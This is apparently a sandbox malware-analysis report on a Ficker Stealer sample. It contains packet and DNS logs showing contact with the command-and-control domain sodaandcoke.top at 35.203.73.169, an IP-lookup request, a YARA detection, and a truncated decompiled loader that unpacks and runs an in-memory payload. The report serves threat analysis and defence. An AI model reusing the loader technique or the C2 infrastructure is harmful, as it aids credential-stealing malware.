                Apr 26, 2021 13:12:19.719540119 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.719645023 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.719820023 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.719909906 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.720140934 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.720217943 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.720540047 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.720660925 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.720784903 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.720875025 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.769609928 CEST804972235.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.770051003 CEST4972280192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.770122051 CEST4972280192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.770195961 CEST4972280192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.770308971 CEST4972280192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.770359993 CEST4972280192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.857115030 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.857310057 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.859541893 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.859561920 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.859577894 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.859587908 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.859597921 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.859608889 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.859622002 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.859639883 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.859723091 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.859778881 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.859808922 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.859842062 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.859855890 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.900203943 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.900449991 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.906716108 CEST804972235.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.906749010 CEST804972235.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.906765938 CEST804972235.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.906784058 CEST804972235.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.906800032 CEST804972235.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.994807959 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.994946957 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.995253086 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.995337009 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.997159958 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.997261047 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.997643948 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.997749090 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.998626947 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.998711109 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.998723030 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.998797894 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.999497890 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.999593019 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:19.999805927 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:19.999977112 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.000138044 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.000154018 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.023586988 CEST804972235.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.023854971 CEST4972280192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.081444979 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.082355022 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.131607056 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.131683111 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.131922007 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.132035017 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.132316113 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.132335901 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.132415056 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.132440090 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.133908033 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.134041071 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.134262085 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.134336948 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.134530067 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.134592056 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.134757996 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.134840012 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.135122061 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.135217905 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.135756016 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.135772943 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.135835886 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.135871887 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.136065006 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.136130095 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.136487007 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.136558056 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.136902094 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.137017012 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.203934908 CEST804972235.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.260386944 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.260461092 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.268397093 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.268503904 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.268601894 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.268675089 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.268874884 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.268951893 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.269027948 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.269134045 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.269373894 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.269457102 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.271117926 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.271203995 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.271353960 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.271451950 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.271652937 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.271733999 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.272145987 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.272203922 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.273236036 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.273252010 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.273401022 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.273595095 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.273672104 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.273701906 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.276444912 CEST804972235.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.276540995 CEST4972280192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.405210972 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.405281067 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.405431032 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.405514002 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.405726910 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.405790091 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.406333923 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.406405926 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.408004999 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.408108950 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.408404112 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.408493996 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.408638000 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.408721924 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.409044981 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.409123898 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.410279989 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.410299063 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.410351992 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.410373926 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.410609961 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.410732985 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.410970926 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.411101103 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.442348003 CEST4971280192.168.2.654.225.155.255
                Apr 26, 2021 13:12:20.542149067 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.542356014 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.542356014 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.542435884 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.542715073 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.542783976 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.542834044 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.542951107 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.543143034 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.543237925 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.544584990 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.544924021 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.545036077 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.545631886 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.545922995 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.546057940 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.546211958 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.546304941 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.546981096 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.547091007 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.547285080 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.547373056 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.547482014 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.547641039 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.547774076 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.547909975 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.547960043 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.548022032 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.548082113 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.548257113 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.679255009 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.679281950 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.679461956 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.679657936 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.679718971 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.679939985 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.681580067 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.681603909 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.682492018 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.683063984 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.683084011 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.683334112 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.683379889 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.683489084 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.683692932 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.683801889 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.683988094 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.684262991 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.684278965 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.684407949 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.684679031 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.684847116 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.685018063 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.685120106 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.685440063 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.685525894 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.816633940 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.816668987 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.816883087 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.819199085 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.819730043 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.819991112 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.820013046 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.820115089 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.820544004 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.820672035 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.821324110 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.821347952 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.821422100 CEST4971480192.168.2.635.203.73.169
                Apr 26, 2021 13:12:20.821741104 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.822145939 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.953843117 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.955243111 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.956718922 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.956749916 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.957006931 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.957315922 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.957956076 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.957972050 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:20.958022118 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:21.251044035 CEST804971435.203.73.169192.168.2.6
                Apr 26, 2021 13:12:21.253206968 CEST4971480192.168.2.635.203.73.169

                UDP Packets


                DNS Queries

                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                Apr 26, 2021 13:12:12.212172031 CEST | 192.168.2.6 | 8.8.8.8 | 0x4a4 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001)
                Apr 26, 2021 13:12:12.640269995 CEST | 192.168.2.6 | 8.8.8.8 | 0x2fdd | Standard query (0) | sodaandcoke.top | A (IP address) | IN (0x0001)
                Apr 26, 2021 13:12:19.203447104 CEST | 192.168.2.6 | 8.8.8.8 | 0x25be | Standard query (0) | sodaandcoke.top | A (IP address) | IN (0x0001)

                DNS Answers

                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                Apr 26, 2021 13:12:12.263802052 CEST | 8.8.8.8 | 192.168.2.6 | 0x4a4 | No error (0) | api.ipify.org | nagano-19599.herokussl.com | | CNAME (Canonical name) | IN (0x0001)
                Apr 26, 2021 13:12:12.263802052 CEST | 8.8.8.8 | 192.168.2.6 | 0x4a4 | No error (0) | nagano-19599.herokussl.com | elb097307-934924932.us-east-1.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
                Apr 26, 2021 13:12:12.263802052 CEST | 8.8.8.8 | 192.168.2.6 | 0x4a4 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.225.155.255 | A (IP address) | IN (0x0001)
                Apr 26, 2021 13:12:12.263802052 CEST | 8.8.8.8 | 192.168.2.6 | 0x4a4 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 23.21.48.44 | A (IP address) | IN (0x0001)
                Apr 26, 2021 13:12:12.263802052 CEST | 8.8.8.8 | 192.168.2.6 | 0x4a4 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.235.83.248 | A (IP address) | IN (0x0001)
                Apr 26, 2021 13:12:12.263802052 CEST | 8.8.8.8 | 192.168.2.6 | 0x4a4 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.225.144.221 | A (IP address) | IN (0x0001)
                Apr 26, 2021 13:12:12.263802052 CEST | 8.8.8.8 | 192.168.2.6 | 0x4a4 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.235.175.90 | A (IP address) | IN (0x0001)
                Apr 26, 2021 13:12:12.263802052 CEST | 8.8.8.8 | 192.168.2.6 | 0x4a4 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 50.19.96.218 | A (IP address) | IN (0x0001)
                Apr 26, 2021 13:12:12.263802052 CEST | 8.8.8.8 | 192.168.2.6 | 0x4a4 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.225.157.230 | A (IP address) | IN (0x0001)
                Apr 26, 2021 13:12:12.263802052 CEST | 8.8.8.8 | 192.168.2.6 | 0x4a4 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 23.21.252.4 | A (IP address) | IN (0x0001)
                Apr 26, 2021 13:12:13.010302067 CEST | 8.8.8.8 | 192.168.2.6 | 0x2fdd | No error (0) | sodaandcoke.top | | 35.203.73.169 | A (IP address) | IN (0x0001)
                Apr 26, 2021 13:12:19.260727882 CEST | 8.8.8.8 | 192.168.2.6 | 0x25be | No error (0) | sodaandcoke.top | | 35.203.73.169 | A (IP address) | IN (0x0001)

                HTTP Request Dependency Graph

                • api.ipify.org

                HTTP Packets

                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                0 | 192.168.2.6 | 49712 | 54.225.155.255 | 80 | C:\Users\user\Desktop\8s7bEDfYhT.exe
                Timestamp | kBytes transferred | Direction | Data
                Apr 26, 2021 13:12:12.434504032 CEST | 1132 | OUT | GET /?format=xml HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: api.ipify.org
                Connection: Keep-Alive
                Apr 26, 2021 13:12:12.625264883 CEST | 1137 | IN | HTTP/1.1 200 OK
                Server: Cowboy
                Connection: keep-alive
                Content-Type: text/plain
                Vary: Origin
                Date: Mon, 26 Apr 2021 11:12:12 GMT
                Content-Length: 10
                Via: 1.1 vegur
                Data Raw: 38 34 2e 31 37 2e 35 32 2e 33
                Data Ascii: 84.17.52.3


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                1 | 35.203.73.169 | 80 | 192.168.2.6 | 49714 | C:\Users\user\Desktop\8s7bEDfYhT.exe


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                2 | 35.203.73.169 | 80 | 192.168.2.6 | 49722 | C:\Users\user\Desktop\8s7bEDfYhT.exe



                System Behavior

                General

                Start time: 13:12:10
                Start date: 26/04/2021
                Path: C:\Users\user\Desktop\8s7bEDfYhT.exe
                Wow64 process (32bit): true
                Commandline: 'C:\Users\user\Desktop\8s7bEDfYhT.exe'
                Imagebase: 0x400000
                File size: 381966 bytes
                MD5 hash: E0F6D15001D810320BBE9614C9365CA6
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: low

                General

                Start time: 13:12:11
                Start date: 26/04/2021
                Path: C:\Users\user\Desktop\8s7bEDfYhT.exe
                Wow64 process (32bit): true
                Commandline: 'C:\Users\user\Desktop\8s7bEDfYhT.exe'
                Imagebase: 0x400000
                File size: 381966 bytes
                MD5 hash: E0F6D15001D810320BBE9614C9365CA6
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Ficker_Stealer_1, Description: Yara detected Ficker Stealer, Source: 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmp, Author: Joe Security
                Reputation: low

                Disassembly

                Code Analysis


                  Executed Functions

                  C-Code - Quality: 87%
                  			E0044CFD0() {
                  				signed int _v8;
                  				char _v2052;
                  				char _v2056;
                  				char _v2228;
                  				short _v2230;
                  				void _v2232;
                  				long _v2236;
                  				short _v2238;
                  				intOrPtr _v2242;
                  				struct _FILETIME _v2244;
                  				intOrPtr _v2246;
                  				intOrPtr _v2250;
                  				char _v2252;
                  				short _v2254;
                  				intOrPtr _v2258;
                  				intOrPtr _v2262;
                  				intOrPtr _v2266;
                  				char _v2268;
                  				void* _v2272;
                  				void* _v2276;
                  				void* _v2280;
                  				char _v2292;
                  				long _v2296;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t48;
                  				void* _t50;
                  				void* _t51;
                  				long _t57;
                  				int _t66;
                  				void* _t106;
                  				void* _t107;
                  				void* _t110;
                  				long _t118;
                  				long _t135;
                  				void* _t136;
                  				void* _t137;
                  				void* _t138;
                  				void* _t142;
                  				signed int _t143;
                  				void* _t144;
                  				void* _t150;
                  
                  				_t48 =  *0x44f0d4; // 0x45b66027
                  				_v8 = _t48 ^ _t143;
                  				if( *0x477a9c == 0x7c) {
                  					GetCompressedFileSizeA(0,  &_v2296);
                  					OpenWaitableTimerW(0, 0, 0);
                  					__imp__GetConsoleAliasW( &_v2056, 0, 0, 0);
                  					SetFileTime(0, 0, 0, 0);
                  					GlobalFindAtomW(0);
                  					_v2232 = 0;
                  					DisconnectNamedPipe( &_v2232);
                  					FindAtomW(0);
                  					GlobalUnlock(0);
                  					if( *0x477a9c == 0x11) {
                  						__imp__GetModuleHandleExW(0, 0,  &(_v2244.dwHighDateTime));
                  					}
                  					if( *0x477a9c == 0x54) {
                  						GetCurrentProcess();
                  						FileTimeToSystemTime( &_v2244, 0);
                  					}
                  					E00402581(0, "zitomuridapelagajepegolik pegehegovamasetotid %s %d %f");
                  					_t144 = _t144 + 8;
                  				}
                  				_t156 =  *0x477a9c - 0x110a;
                  				if( *0x477a9c == 0x110a) {
                  					 *0x46f980 = 0;
                  					 *0x46f984 = 0;
                  					SetTimeZoneInformation(0);
                  					SetTapeParameters(0, 0, 0);
                  					GlobalWire(0);
                  					_v2268 = 0;
                  					_v2266 = 0;
                  					_v2262 = 0;
                  					_v2258 = 0;
                  					_v2254 = 0;
                  					_v2252 = 0;
                  					_v2250 = 0;
                  					_v2246 = 0;
                  					_v2242 = 0;
                  					_v2238 = 0;
                  					__imp__TzSpecificLocalTimeToSystemTime( &_v2268,  &_v2252);
                  					SetWaitableTimer(0, 0, 0, 0, 0, 0);
                  					E0040242D( &_v2252, _t156, 0, 0);
                  					E0040242D( &_v2252, _t156, 0, 0);
                  					E00402B6B("0.txt", "rb");
                  					E004012E0( &_v2292);
                  					E00402581("0 %s %d %f",  &_v2228);
                  					_v2056 = 0x30;
                  					E0040A540(_t134,  &_v2052, 0, 0x7fc);
                  					E00402856(_t156, 0x46f998, 0x8102,  &_v2056, 0,  &_v8);
                  					E0040242D( &_v2056, _t156, 0, 0);
                  					E0040271E(_t156, 0);
                  					E00402134(0);
                  					_t89 = _v2280;
                  					_t150 = _t144 + 0x4c;
                  					_t157 = _v2280;
                  					if(_v2280 != 0) {
                  						_t134 = _v2276;
                  						_push(_v2244.dwHighDateTime);
                  						E00401DD0(_t89, _v2276);
                  						E00402BD5(_t106, _v2276, 0, _t157, _v2280);
                  						_t150 = _t150 + 8;
                  					}
                  					_v2280 = 0;
                  					_v2276 = 0;
                  					_v2272 = 0;
                  					E00402BD5(_t106, _t134, 0, _t157, _v2292);
                  				}
                  				_t50 = LocalAlloc(0,  *0x477a9c); // executed
                  				 *0x46f394 = _t50;
                  				_t51 = 0;
                  				if( *0x477a9c > 0) {
                  					do {
                  						 *((char*)( *0x46f394 + _t51)) =  *((intOrPtr*)( *0x477aa0 + _t51 + 0x15));
                  						_t118 =  *0x477a9c;
                  						if(_t118 == 0x203) {
                  							 *0x46f398 = 0x1974;
                  						}
                  						_t51 = _t51 + 1;
                  					} while (_t51 < _t118);
                  				}
                  				_v2232 = 0x20;
                  				_v2232 = _v2232 + 0x20;
                  				lstrcatW(0x46f998, L"kernel32.dll");
                  				 *0x46f380 = GetProcAddress(GetModuleHandleW(0x46f998), "VirtualProtect");
                  				VirtualProtect( *0x46f394,  *0x477a9c, 0x40,  &_v2236); // executed
                  				_t57 =  *0x477a9c;
                  				_t107 =  *0x46f394;
                  				_t135 = _t57;
                  				if(_t57 == 0x5dd) {
                  					SetSystemTimeAdjustment(0, 0);
                  					_t57 =  *0x477a9c;
                  				}
                  				_t127 =  *0x450100; // 0xdd409db6
                  				 *0x46f384 = _t127;
                  				if(_t57 == 0x114e) {
                  					GetFileAttributesW(0);
                  					_t57 =  *0x477a9c;
                  				}
                  				if(_t57 == 0xa57) {
                  					TerminateProcess(0, 0);
                  				}
                  				E0044CEC0(_t107, _t135);
                  				if( *0x477a9c == 0x568) {
                  					SizeofResource(0, 0);
                  				}
                  				_t136 = 0;
                  				do {
                  					if(_t136 == 0xbd9cb) {
                  						 *0x46f394 =  *0x46f394;
                  					}
                  					if( *0x477a9c == 0x6ce) {
                  						InterlockedIncrement( &(_v2244.dwHighDateTime));
                  					}
                  					_t136 = _t136 + 1;
                  				} while (_t136 < 0x15a63d);
                  				_t137 = 0;
                  				do {
                  					if(_t137 == 0x12e91b) {
                  						 *0x46f394();
                  					}
                  					 *0x46f988 = 0x8e55e61a;
                  					if( *0x477a9c == 0x58) {
                  						SetFileAttributesA(0, 0);
                  						_t127 = 0;
                  						_v2232 = 0;
                  						_v2230 = 0;
